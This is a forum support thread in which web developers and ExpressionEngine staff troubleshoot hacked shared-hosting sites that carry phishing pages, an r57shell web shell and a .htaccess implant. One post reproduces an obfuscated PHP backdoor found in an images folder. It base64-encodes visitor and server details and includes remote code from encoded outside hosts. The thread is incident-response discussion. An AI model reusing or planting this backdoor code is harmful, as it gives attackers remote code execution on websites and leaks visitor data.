Thread

Hi there,

I’ve got two clients being suspended for having ee script, the server security has been breached and they asked me to upgrade the script ASAP.

EE version 1.52

I also have the email sent directly from AUSCERT, a very kind reminder to cleaning, closing or disallowing the sites that has been used as fraudulent website.

Now, I’m not accusing your script, but I needed a guidance to track this down, so I can have the solution.

Its twice in this couple of weeks, and both of them using EE as cms. :(

Thanks for your kind help ...

Security it top priority for EE- so let’s run this one down.

- You’re using 1.5.2- while it is definitely a good idea to update to the latest, no known security holes are associated with the version;
- Do you have any other scripts running on the site(s)- phpBB, etc;
- Who is your host, did they give any indication of how the sites might have been compromised?  Are these shared hosting accounts?
- What was the breach- were EE files compromised/altered, or extra pages added- what exactly happened.  The more detail you can give us, the better.
- Check the following files to make sure no iframes, javascript, extra code has been added:
* path.php
* config.php
* index.php

All that make sense?

http://www.****.com.au/images/onlineservices.wachovia.com/www.wachovia.com/Wachovia_Online/AuthServiceaction=presentLogin/index.htm

They breach the images folder, but I had not yet been able to access that folder, as my host put an access denied on it….

- no phpbb script or other script
- my host is using Jumba/AussieHQ
- I will check the files soon…

Thanks for your guidance Robin..

<? error_reporting(0);$s=“e”;$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);$d=(isset($_SERVER[“PHP_SELF”]) ? $_SERVER[“PHP_SELF”] : $PHP_SELF);$e=(isset($_SERVER[“QUERY_STRING”]) ? $_SERVER[“QUERY_STRING”] : $QUERY_STRING);$f=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);$i=(isset($_SERVER[“SCRIPT_FILENAME”]) ? $_SERVER[“SCRIPT_FILENAME”] : $SCRIPT_FILENAME);$j=(isset($_SERVER[“HTTP_ACCEPT_LANGUAGE”]) ? $_SERVER[“HTTP_ACCEPT_LANGUAGE”] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.$s.”.base64_encode($i).”.”.base64_encode($j); if ((include(base64_decode(“aHR0cDovLw==”).base64_decode(“d3d3My5yc3NuZXdzLndz”).”/?”.$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

I found this in the images folder… is this part of your script?

No, that is not part of our script? What What is the name of the file?

Have you spoken with your host about how they gained access?

No, that isn’t part of EE.

You must set the following directories to 777:

  * images/avatars/uploads/
  * images/captchas/
  * images/member_photos/
  * images/pm_attachments/
  * images/signature_attachments/
  * images/uploads/
  * system/cache/

All the following directories has been breached, they put .htaccess and a php file… but this is what I followed from the installation guide… What did I do wrong then?

You did nothing wrong, please see Derek’s comment about this.  Have you spoken with your host?

yes…but at the moment, all they asked is to update my script…wth?

I’m cleaning up all these junk…all my client folder has been breached now…

Your host should be able to identify how the hackers gained entry, and should be knowledgeable enough to secure against that in the future.  ExpressionEngine has an extremely good security history. You can see Derek’s recommendations for how the hosts can keep directories secure while still being fully writable by ExpressionEngine.

I have never been experiencing this problem before, since we moved onto the new server, this problem kept on appearing. I have notified my host about this post, the secunia link, and derek’s comment too… I did clean up all the malicious script, then I chmod all the required folder in images with 755, then chmod 600 for config.php, config_bak.php, path.php

Is this okay for now?

That should be fine.  I do want to be extremely clear that the attack did not come through ExpressionEngine; it sounds like the hackers gained access through the file-system (how they did that is something the host should be able to track down) and then traversed to your directories (and probably others on your server) and placed these files. 

It sounds like you have everything on track now.

Yes… you are right Lisa, apparently a few days a go, another user from this webhost experienced the same issue. His images folder has been breached too… Here’s his comment:

Anyway. I have logged onto said account via FTP, and there is something really suss. There is a directory in /images/ called “RBC_files” with what appears to have no permissions set. I change permissions to 777 via FTP, but the permissions dont actually change.
The attributes on this directory say that the “RBC_files” directory was added at 9:33am this morning. I can honestly tell you that this directory was NOT added by anyone who should have.

I suggest others who are on the Aussie server to check their /images/ directory for the above files and folders.

Well, I would keep on the host and see what precautions they are taking against this occurring in the future.  =)

Here’s another script founded inside the folder “image”

r57shell.php

Commonly php injection to the server…

I have now chmodded all the folders related to the breach with 744…is this going to affect the script Lisa?